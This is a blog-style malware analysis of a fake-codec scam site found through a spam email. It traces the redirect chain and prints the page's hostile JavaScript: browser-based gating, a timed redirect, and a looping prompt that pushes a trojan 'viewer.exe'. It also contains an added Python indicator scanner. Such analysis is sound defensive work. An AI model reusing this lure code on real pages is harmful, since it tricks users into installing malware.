[Malware] Dissection of a Fake Codec Malicious Website

October 26, 2008

Hi,

Today I’ve received a spam mail from peteru.aranka.mark@t-online.de with the subject
“You gotta take a look at this video.” and a link to http://k_CENSORED_y.net/

From this domain we are redirected to http://79._CENSORED_.18/, which presents
the following HTML:

———————————–
<script type="text/javascript">
<!--
window.location = "/uploads"
//-->
</script>
————————————

As the window.location suggests, we append /uploads to http://79._CENSORED_.18/

so we land here:

——————–
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://79._CENSORED_.18/uploads/">here</a>.</p>
<hr>
<address>Apache/2 Server at 79.1_CENSORED_.18 Port 80</address>
</body></html>
——————-

Fetching http://79._CENSORED_.18/uploads/ again with Malzilla, we finally land on the
real malicious page.

——————
<html>
<head>
<title>HARDCORE VIDEO ONLINE!</title>
——————

This is really interesting:

——————
<script language="javascript">
codec_url='viewer.exe';
</script>
——————

Sounds like the classic Codec Scam, so let's see what else this page does..

——————
<script language="javascript">

// Skips the automatic download when the User-Agent contains "SV1" or "MSIE 7";
// every other browser is sent to viewer.exe after 3 seconds.
function softdownload()
{
  if(window.navigator.userAgent.indexOf("SV1") != -1 || window.navigator.userAgent.indexOf("MSIE 7") != -1)
  {
    return;
  }
  else
  {
    window.setTimeout("location.href='" + codec_url + "'", 3000);
  }
}

// Nags the victim until they click OK: alert() returns undefined, so both
// branches call play() again and the prompt never goes away.
function play() {
  if (confirm('Click \'OK\' to download and install media codec.')) {
    window.location.href=codec_url;
  }
  else {
    if (alert('Please download new version of media codec software.')) {
      play();
    }
    else {
      play();
    }
  }
}
——————

The first function checks the User-Agent of the victim's browser and, when the
conditions allow it, assembles the string that constitutes the download URL and
loads it after a three-second delay.
The play() function tells the victim to download and install viewer.exe.

This is the fake advertisement:

——————
<b>Video ActiveX Object Error:</b><br>

Your browser cannot display this video file.<br><br>
You need to download new version of Video<br>
ActiveX Object to play this video file.
——————

So the user is prompted to download the Fake Codec.
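A small indicator scan over the page structure shown above, as an added example that is not part of the original post: the sample HTML is constructed from the snippets quoted here, the indicator names are my own labels, and the threshold of three co-occurring indicators is an assumption.

```python
import re

# Constructed sample, trimmed from the snippets quoted in the post above
SAMPLE_PAGE = """<html><head><title>HARDCORE VIDEO ONLINE!</title>
<script language="javascript">
codec_url='viewer.exe';
</script>
<script language="javascript">
function softdownload() {
  if(window.navigator.userAgent.indexOf("SV1") != -1) { return; }
  window.setTimeout("location.href='" + codec_url + "'", 3000);
}
function play() {
  if (confirm('Click \\'OK\\' to download and install media codec.')) {
    window.location.href=codec_url;
  }
}
</script></head><body>
<b>Video ActiveX Object Error:</b><br>
You need to download new version of Video ActiveX Object to play this video file.
</body></html>"""

BENIGN_PAGE = "<html><body><video src='clip.mp4' controls></video></body></html>"  # constructed: real <video>, no download

# (indicator name, pattern); names are my own labels for the tricks seen above
INDICATORS = [
    ("executable assigned to codec_url", re.compile(r"codec_url\s*=\s*['\"][^'\"]+\.exe['\"]", re.I)),
    ("timed redirect to codec_url", re.compile(r"setTimeout\(\s*['\"]location\.href=.*codec_url", re.I)),
    ("confirm() prompt to install codec", re.compile(r"confirm\(.*codec", re.I)),
    ("user-agent gating", re.compile(r"userAgent\.indexOf\(", re.I)),
    ("fake ActiveX error text", re.compile(r"ActiveX Object Error", re.I)),
]

def scan_page(html):
    """Return the names of the fake-codec indicators present in the HTML."""
    return [name for name, rx in INDICATORS if rx.search(html)]

def codec_targets(html):
    """Extract every filename assigned to codec_url (the 'codec' the page pushes)."""
    return re.findall(r"codec_url\s*=\s*['\"]([^'\"]+)['\"]", html, re.I)

def verdict(html, threshold=3):
    """Flag the page only when at least `threshold` indicators co-occur."""
    hits = scan_page(html)
    return ("fake-codec page" if len(hits) >= threshold else "no match", hits)

if __name__ == "__main__":
    for label, page in (("sample", SAMPLE_PAGE), ("benign", BENIGN_PAGE)):
        print(label, verdict(page), codec_targets(page))
```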

Let’s see what is viewer.exe

File:             viewer.exe
Status:           INFECTED/MALWARE
MD5:              9eae38ac9c9a97074ce4119d81fa7acf
Packers detected: –

Kaspersky Anti-Virus: Found Trojan-Downloader.Win32.Agent.aggp

So pay attention when you meet websites that offer strange custom Codecs! 😉

See you in the next post.. 🙂